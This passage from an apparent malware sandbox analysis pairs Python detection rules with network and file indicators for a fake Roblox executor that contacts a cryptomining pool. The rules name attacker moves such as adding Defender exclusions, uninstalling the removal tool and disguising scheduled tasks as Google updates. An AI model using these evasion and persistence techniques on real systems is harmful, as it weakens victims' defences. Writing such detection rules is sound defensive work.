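
def _task_name(cmd):
    """Pull the task name out of schtasks /tn or Register-ScheduledTask -TaskName."""
    m = re.search(r"""(?:/tn|-TaskName)\s+['"]?([\w.-]+)""", cmd, re.I)
    return m.group(1) if m else None


def rule_defender_exclusion(cmd):
    # Add-MpPreference with any -Exclusion* switch widens what Defender will not scan.
    return re.search(r"Add-MpPreference\b.*-Exclusion(Path|Extension|Process)", cmd, re.I) is not None


def rule_msrt_uninstall(cmd):
    # KB890830 is the Malicious Software Removal Tool; removing it drops a built-in
    # cleanup pass without touching Defender's own settings.
    return re.search(r"\bwusa(\.exe)?\b.*?/uninstall\b.*?/kb:890830\b", cmd, re.I) is not None


def rule_google_update_task(cmd):
    # A GoogleUpdateTaskMachine* task that is not one Google creates.
    name = _task_name(cmd)
    if not name or not name.lower().startswith("googleupdatetaskmachine"):
        return False
    return name not in LEGIT_GOOGLE_TASKS


def rule_powershell_junk_comment(cmd):
    # A <#...#> block comment right after powershell.exe carries no logic;
    # it only changes the command-line text from run to run.
    return re.search(r"powershell(\.exe)?\s+<#[^#]*#>", cmd, re.I) is not None


def rule_random_service_start(cmd):
    # Heuristic: sc start of a service named with eight uppercase letters and nothing else.
    return re.search(r'\bsc(\.exe)?\s+start\s+"?([A-Z]{8})"?\s*$', cmd) is not None


def rule_bare_dialer(cmd):
    # dialer.exe has almost no legitimate use; the report shows it spawned with no arguments.
    return re.fullmatch(r"(?i)(?:\S*\\)?dialer\.exe", cmd.strip()) is not None


RULES = {
    "defender_exclusion_added": rule_defender_exclusion,
    "msrt_uninstall": rule_msrt_uninstall,
    "suspicious_google_update_task": rule_google_update_task,
    "powershell_junk_comment": rule_powershell_junk_comment,
    "random_service_start": rule_random_service_start,
    "bare_dialer_exe": rule_bare_dialer,
}


def match_rules(cmd):
    """Names of every rule that fires on one command line, in RULES order."""
    return [name for name, fn in RULES.items() if fn(cmd)]


def scan(cmdlines):
    """Map each command line that fires at least one rule to the rule names."""
    hits = {}
    for cmd in cmdlines:
        fired = match_rules(cmd)
        if fired:
            hits[cmd] = fired
    return hits


if __name__ == "__main__":
    for cmd, fired in scan(SAMPLE_CMDLINES).items():
        print(", ".join(fired), "<-", cmd[:80])
```

In production the same functions run over Sysmon Event ID 1 or Security 4688 command lines rather than the list above. The Add-MpPreference rule is worth pairing with Defender's own Event ID 5007 (configuration change), which records the exclusion regardless of how it was added; the scheduled-task rule catches both the creation and the later `schtasks /run` of the task, as the process list shows, and the service-name heuristic is deliberately narrow so that it flags names like HGJYCZBA without firing on ordinary services.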

Network

Country Destination Domain Proto
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 neoblox.is-from.space udp
US 172.67.165.148:443 neoblox.is-from.space tcp
US 172.67.212.247:443 us-east-1.tixte.net tcp
US 8.8.8.8:53 247.212.67.172.in-addr.arpa udp
DE 95.179.241.203:80 pool.hashvault.pro tcp

Files

C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe

MD5 fa532255379e9d0135b519e96b62f6ca
SHA1 099c0338db1a0aedf4e050ad0be7380034cf149e
SHA256 3335ee3c5d3f45de09712165a407755a051e5a2c812fa2a87d81431b5b3c583a
SHA512 fd2176004c7235bf215c2c62064559c023e47aa5def987c8344765d5f67a1dfb74e0bfb0ecd044bb1be247b3db4204a8c8bd2cbe622ba99bd81f0a6921c2bd4e

memory/3248-22-0x0000000002E30000-0x0000000002E66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe

MD5 07c00a89b882adab59d0b2e6eeac3516
SHA1 05ef4e1c48a3d081bb535b979e0e88a242cfdd48
SHA256 719f686324040140c4d8b03c5a35c4036b2a5535f1ee5aaf50ad79f2367126e2
SHA512 6a98ce5df9a7fbeb910bbea419b22794b7b4cde06f19222e55c1a21642a1e7b0036ae95022006de7ce8eabca78773ec07b01ee6e9d6ef6a6d7b62aebf5e15401

C:\Users\Admin\AppData\Local\Temp\Roblox.exe

MD5 fa9383ead577a1004af69c84708d66e0
SHA1 db0472630e63ae1819fdadbef7def6bbeb0c485e
SHA256 e8e0c6615894c8eecdb536ea891f042ca35e44afac88beddb9e9a4c79bb3c293
SHA512 6f67a6e52910c578e8ec953bfc1fb17d49b7fc1bc0337a5e3fe41e4572f0e2bdeaeb45b2be44ceda471ba64e8381cd08bdca1faec7dc2cdc67c6534e007ffd92

memory/3248-33-0x0000000005590000-0x0000000005BBA000-memory.dmp

memory/3000-35-0x0000000000340000-0x0000000000396000-memory.dmp

memory/3000-36-0x00000000024C0000-0x00000000024CA000-memory.dmp

memory/3248-37-0x0000000005320000-0x0000000005342000-memory.dmp

memory/3248-39-0x0000000005BC0000-0x0000000005C26000-memory.dmp

memory/3248-38-0x00000000054C0000-0x0000000005526000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yzxokpub.zx2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1628-58-0x0000000005E50000-0x00000000061A7000-memory.dmp

memory/3248-62-0x00000000062C0000-0x00000000062DE000-memory.dmp

memory/3248-63-0x0000000006870000-0x00000000068BC000-memory.dmp

memory/1628-66-0x0000000007260000-0x0000000007294000-memory.dmp

memory/1628-85-0x00000000074A0000-0x00000000074BE000-memory.dmp

memory/3248-68-0x0000000070670000-0x00000000706BC000-memory.dmp

memory/1628-67-0x0000000070670000-0x00000000706BC000-memory.dmp

memory/1628-86-0x00000000074C0000-0x0000000007564000-memory.dmp

memory/3248-88-0x0000000007600000-0x000000000761A000-memory.dmp

memory/1628-87-0x0000000007C40000-0x00000000082BA000-memory.dmp

memory/1628-89-0x0000000007690000-0x000000000769A000-memory.dmp

memory/1628-90-0x0000000007890000-0x0000000007926000-memory.dmp

memory/3248-91-0x0000000007810000-0x0000000007821000-memory.dmp

memory/1628-92-0x0000000007850000-0x000000000785E000-memory.dmp

memory/3248-93-0x0000000007860000-0x0000000007875000-memory.dmp

memory/1628-94-0x0000000007950000-0x000000000796A000-memory.dmp

memory/3248-95-0x0000000007940000-0x0000000007948000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 95b3af1c4e3702aee1179de79b0c6425
SHA1 392f6f1c38b9457a2ea152f9ed17f47f60191b01
SHA256 e875db059a037942a276b5e7b30ffdb4d1f896fdd43812ae067cc81d07153c0f
SHA512 af71b3d08de5423251c254ba9234239fac672f788a424b9a8442b2fd5abf6428a9f5b5ea737c7bdbd33fc311aa8efddd650f81d06ea47f5fef9e7dfd274b48f6

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 ac4917a885cf6050b1a483e4bc4d2ea5
SHA1 b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f
SHA256 e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9
SHA512 092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

memory/4384-101-0x00007FF798B00000-0x00007FF79C3B3000-memory.dmp

memory/4692-102-0x000001B5C89A0000-0x000001B5C89C2000-memory.dmp

memory/3024-117-0x0000000140000000-0x000000014002B000-memory.dmp

memory/3024-119-0x0000000140000000-0x000000014002B000-memory.dmp

memory/3024-116-0x0000000140000000-0x000000014002B000-memory.dmp

memory/3024-120-0x00007FF93A7E0000-0x00007FF93A9E9000-memory.dmp

memory/3024-121-0x00007FF93A130000-0x00007FF93A1ED000-memory.dmp

memory/3024-122-0x0000000140000000-0x000000014002B000-memory.dmp

memory/552-136-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/1004-139-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/732-143-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/732-142-0x000001CB19150000-0x000001CB1917B000-memory.dmp

memory/1212-162-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/1288-168-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/1288-167-0x000001CB76CF0000-0x000001CB76D1B000-memory.dmp

memory/1256-165-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/1256-164-0x000001C5D5D00000-0x000001C5D5D2B000-memory.dmp

memory/1212-161-0x0000027991F60000-0x0000027991F8B000-memory.dmp

memory/1100-159-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/1100-158-0x000002384A2E0000-0x000002384A30B000-memory.dmp

memory/1088-156-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/1088-155-0x0000022A7B3B0000-0x0000022A7B3DB000-memory.dmp

memory/760-153-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/760-152-0x00000138CEBD0000-0x00000138CEBFB000-memory.dmp

memory/1004-138-0x0000020957D70000-0x0000020957D9B000-memory.dmp

memory/552-135-0x000002814D000000-0x000002814D02B000-memory.dmp

memory/648-133-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/648-132-0x0000023C3D8A0000-0x0000023C3D8CB000-memory.dmp

memory/704-128-0x00007FF8FA870000-0x00007FF8FA880000-memory.dmp

memory/704-127-0x000001D9F22F0000-0x000001D9F231B000-memory.dmp

memory/648-125-0x0000023C3D870000-0x0000023C3D894000-memory.dmp

memory/3024-115-0x0000000140000000-0x000000014002B000-memory.dmp

memory/3024-114-0x0000000140000000-0x000000014002B000-memory.dmp

memory/3248-396-0x000001EA6F170000-0x000001EA6F18C000-memory.dmp

memory/3248-397-0x000001EA6F190000-0x000001EA6F243000-memory.dmp

memory/3248-398-0x000001EA6F350000-0x000001EA6F35A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

memory/3248-404-0x000001EA6F380000-0x000001EA6F39C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6344564097353c8e7e68991fffa80d88
SHA1 2ac4d108a30ec3fbd2938b0563eb912415ea7c62
SHA256 d0af6d69f8bc0c98e9fb61dead6327bbc8b4f5292529313515382d8f883de0da
SHA512 e2b37a9001a91cb05483d72f88bd70a61ca5655939c2290fd1580710eec9d8d26a5fedbcb5223f5413b5dcc46f1d8b6b408e57be0e4ad4b37b55cbce9023a303

memory/3248-418-0x000001EA6F360000-0x000001EA6F36A000-memory.dmp

memory/3248-431-0x000001EA6F3C0000-0x000001EA6F3DA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 050567a067ffea4eb40fe2eefebdc1ee
SHA1 6e1fb2c7a7976e0724c532449e97722787a00fec
SHA256 3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e
SHA512 341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

memory/3248-444-0x000001EA6F370000-0x000001EA6F378000-memory.dmp

memory/3248-445-0x000001EA6F3A0000-0x000001EA6F3A6000-memory.dmp

memory/3248-446-0x000001EA6F3B0000-0x000001EA6F3BA000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 dbbd2d4458d7e8094846420da595dfc3
SHA1 267cb47b904f14a519d2bd73abfdb30e1a06e1a6
SHA256 e27390d57580e3dfba07bec3d8e430203bbc91e90f6937079b3fd52abc721bd4
SHA512 480e7ca865b811f79f35fcfe7a9ac0280b48d1f9459873d18f000db55c72d53345cf3a10075c1ac407439545f699ce2a7bef38b00b4e19439edf384b00045531

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f2dd68ab8e611f0143c6ad176f223ae9
SHA1 30f580175773f251a9572fe757de6eaef6844abc
SHA256 f935809085e90f8fc2c003afb46e81de28f3312ec097cf46f2bdc2488cb893e7
SHA512 f664b850c2fc6773e48171be5c180d8bc5c3a27945f5e6604605006a3c93e0bf3a516b647d6411a4d6b75bdf0a5e15b4f3621bf5702bbc3c46f9b517cb69dd04

memory/4888-806-0x000002506AB30000-0x000002506ABE3000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0168a3e09b930ae642b50398688e1d87
SHA1 9c7751cf13ecfc704d50c583244cba6e27d226f4
SHA256 f7cd31dcba7eaa70df174c083a18b13c173d64d52a07792a8f2be8d9518c65d0
SHA512 3cb1621320e932594e3f1bf3d6ce388cee51f8610e3e1c0cfef6191591f1c7a48cbec4c8fc5bf67822c0d8abf0977f0378e2dfa6929c9b6376ad0424de9751ed

memory/3000-966-0x0000000005730000-0x0000000005742000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Neoblox\DiscordRPC.xml

MD5 07dceb643b73dd3b700dcf82e1d6663a
SHA1 2d63c2b605485682d999935106ed6d2dbf674d3e
SHA256 24fc42b9582988ed65e5f003aa8e44358691a58f5db6a0e8821560c0fe9b2ee4
SHA512 cc4bc7113301c0dfca2660c00318a0a6603e85d5963440af764c9e0b37fadbcc9c249235ce3efd2a8090c9bb2c56509c097c0c833d4346fae68c72843feae112

C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe.Config

MD5 c7a4606f8f222fc96e1e6b08c093794b
SHA1 2700b3727ab01d93e75e1e12f308dcaeb1d37dba
SHA256 32d656a69b19be98ae050512a4d0f49ebe21b6f7bb9c50130b7e952ea4f5239b
SHA512 7516375b47536a51ede8079d25760e0142ac93077326b6cc033fd6cb1676b65aec7edb3f702922506f2b6b18992cd219be01e7adbf70c6d13404adceb410472b

C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe

MD5 60bdad498581b4998ad0397465d30891
SHA1 a57494c1f958dce86707187d8dfe17ae5c6028b7
SHA256 27ea6419a7bedd7b748b67f7b436d7beff65dcc149ac942b9d840f096fae7355
SHA512 c48bdb6b0cd6c66512f7204ef44b54f6a2a3d57b2586f95cab88288a6da620b060bff8ede38dd9352422ad6b926a2f0ceca76da1bc3df2de3c0867797e665396

C:\Users\Admin\AppData\Local\Temp\Neoblox\Siticone.UI.dll

MD5 fa842ffa299c794e57597aae857d9cb3
SHA1 154afdfd9bd80c1b512f516a8c187c6dd849161e
SHA256 b1d4cdc7891d51636c5e82a91b9bf20e6bb6e68ddf515ac6f51fbda7b199d07d
SHA512 04ee2bff2a9ff0cf89150bb73f0f6a0bda372a245f12c5772b7167821f54f3d1d43292e3ce3c9f2eca2202688c179d5f09248c0fe522bf028c221e07b2d34e4a

memory/4292-1108-0x00000000005D0000-0x00000000006CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Neoblox\WeAreDevs_API.dll

MD5 f263efb1b579cc33a0f1024c2a18d03b
SHA1 e9dc916b6d4606ba47e30787387dcfd490bafc56
SHA256 f2732f9e3a87d874a3108f8ff0be200bcab9d07fe77b02aaacd94da1efcb3963
SHA512 09a3d948b52b16136f2ce9ecdb094a99092a4a9cf6f324e67a0a5d04d244cf4c3fd2696010f1884272240c3bc24fdaf1edc9ac102bc438564e7fc0be7b2fca34

C:\Users\Admin\AppData\Local\Temp\Neoblox\KrnlAPI.dll

MD5 457242aba102f82daedb7ec907b1ac5c
SHA1 bb20ca697349a16fc80c928aea8d155c1cb4fa40
SHA256 3667300295731be993d6a2d6a21e23e8be9fb177a8b3325f55db28fd265fc19a
SHA512 23f8bd7cad2e8530dae8f14e620343658cf07ecfae71d223666166228e2d223abc5e981c26eb78ed4c4737c74284737a854c8e7e7cf06441244cbcfc9c6acd1b

memory/4292-1124-0x0000000005180000-0x0000000005188000-memory.dmp

memory/4292-1118-0x0000000005E00000-0x0000000005F3E000-memory.dmp

memory/4292-1130-0x0000000006010000-0x00000000060D8000-memory.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.9b3603b3-ba4f-4813-b472-d2fc03dbbd53.tmp.txt

MD5 0cc7ed9d5965b1a23319fdba6202f958
SHA1 b9a88d8aa9a49d52626b1cb5968a9ef45abfd3d9
SHA256 456296f92450fcd9a282ff5dc05b4c31ca3e48c056147deef977293b0a94ebda
SHA512 1971e831480d86781aad82edc2bfe037224aabbe579a5dc84de116a1f7b5a4e5b8fb3a0f0b8bf8718ce1d56d9c95871261129df1691e4a8664e7f21986267552

memory/4292-1127-0x00000000057C0000-0x00000000057CA000-memory.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.50d086e2-4870-44b8-8037-cc721cad6d11.tmp.csv

MD5 c4c1702b3b1c321b270e1998e26aef49
SHA1 bb8107f3a58e4630786d7f2a18539b3b565c1257
SHA256 d30a71db027754a1862d7be8b3bf132a4caf37fc9eb8f266a0e07c7114d0302c
SHA512 851d2e5323cadcb34e05c8d4a963f955d49fb74cf04743f214bf31935e25bf6831776e7d25ad6efe4d550835a3d4936c5e3000bdb642e139c51d65d094b9fd97

memory/4292-1114-0x00000000052A0000-0x000000000533E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Neoblox\EasyExploits.dll

MD5 1c5ffe214040f00ec898bd3c5110e8b2
SHA1 4abfbf2bcbcb742b4c4bbb11d21cafeeb93cf8bb
SHA256 23312041ffa8628a7f89a21ba72af853cb90f26cf134d456656276930b26c1ec
SHA512 682e5c06b1d26bee3f8d5cab9ff9c70908906c20b28ad7e022c37ce3b62b9af5cb1bf39734f387353566b45f5cf9f7c879c3d0a32c894168e6fe64ce7b80bd36

memory/4292-1110-0x0000000005190000-0x0000000005222000-memory.dmp

memory/4292-1109-0x0000000005850000-0x0000000005DF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Neoblox\Monaco\Monaco.html

MD5 08b6930cde9eb303d1dd59b311587072
SHA1 9f8b237181c918f7c3b660b0b57d915253243307
SHA256 eaab49b697c5993346036e9a2ff404587d76d7bc548e6cee65fc7b23688e9672
SHA512 178ceeb9c0babf5208d86c339ffa6da7521afa28244505b0fada8a649672c0bba256fb1833ef353f187fa5bc0b8ff2c389bc4a8811eac16330c98d583f375337

C:\Users\Admin\AppData\Local\Temp\Neoblox\Monaco\vs\loader.js

MD5 8a3086f6c6298f986bda09080dd003b1
SHA1 8c7d41c586bfa015fb5cc50a2fdc547711b57c3c
SHA256 0512d9ed3e5bb3daef94aa5c16a6c3e2ee26ffed9de00d1434ffe46a027b16b9
SHA512 9e586742f4e19938132e41145deec584a7b8c7e111b3c6e9254f8d11db632ebe4d66898458ed7bcfc0614d06e20eb33d5a6a8eb8b32d91110557255cf1dbf017

C:\Users\Admin\AppData\Local\Temp\Neoblox\Monaco\vs\editor\editor.main.js

MD5 9399a8eaa741d04b0ae6566a5ebb8106
SHA1 5646a9d35b773d784ad914417ed861c5cba45e31
SHA256 93d28520c07fbca09e20886087f28797bb7bd0e6cf77400153aab5ae67e3ce18
SHA512 d37ef5a848e371f7db9616a4bf8b5347449abb3e244a5527396756791583cad455802450ceeb88dce39642c47aceaf2be6b95bede23b9ed68b5d4b7b9022b9c8

C:\Users\Admin\AppData\Local\Temp\Neoblox\Monaco\vs\editor\editor.main.css

MD5 233217455a3ef3604bf4942024b94f98
SHA1 95cd3ce46f4ca65708ec25d59dddbfa3fc44e143
SHA256 2ec118616a1370e7c37342da85834ca1819400c28f83abfcbbb1ef50b51f7701
SHA512 6f4cb7b88673666b7dc1beab3ec2aec4d7d353e6da9f6f14ed2fee8848c7da34ee5060d9eb34ecbb5db71b5b98e3f8582c09ef3efe4f2d9d3135dea87d497455

C:\Users\Admin\AppData\Local\Temp\Neoblox\Monaco\vs\editor\editor.main.nls.js

MD5 74dd2381ddbb5af80ce28aefed3068fc
SHA1 0996dc91842ab20387e08a46f3807a3f77958902
SHA256 fdd9d64ce5284373d1541528d15e2aa8aa3a4adc11b51b3d71d3a3953f8bcc48
SHA512 8841e0823905cf3168f388a7aeaf5edd32d44902035ba2078202193354caf8cd74cb4cab920e455404575739f35e19ea5f3d88eab012c4ebefc0ccb1ed19a46e